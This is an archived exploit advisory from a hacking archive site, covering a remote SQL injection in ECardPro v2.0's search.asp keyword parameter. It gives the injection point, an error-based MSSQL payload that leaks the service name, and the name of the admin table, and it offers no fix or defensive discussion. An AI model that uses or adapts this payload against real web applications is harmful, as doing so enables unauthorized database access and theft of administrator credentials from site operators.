AOH :: HP Unsorted E :: B06-4785.HTM

ECardPro v2.0(search.asp) Remote SQL Injection Vulnerability



ECardPro v2.0(search.asp) Remote SQL Injection Vulnerability
ECardPro v2.0(search.asp) Remote SQL Injection Vulnerability



Vulnerability Report
*******************************************************************************
# Title  :  ECardPro v2.0(search.asp) Remote SQL Injection Vulnerability

# Author :   ajann

# Script Page : http://www.keyvan1.com

# Exploit;

*******************************************************************************

Data: MSSQL

###http://[target]/[path]/search.asp?keyword='[SQL HERE]

Example: search.asp?keyword='AND%201=convert(int,%20@@servicename) ==> MSSQL Service Name

Admin Table: "admin"
etc(systemtables,union,update,select)......


# ajann,Turkey
# ...
# Im not Hacker!

The entire AOH site is optimized to look best in Firefox® 3 on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH
We do not send spam. If you have received spam bearing an artofhacking.com email address, please forward it with full headers to abuse@artofhacking.com.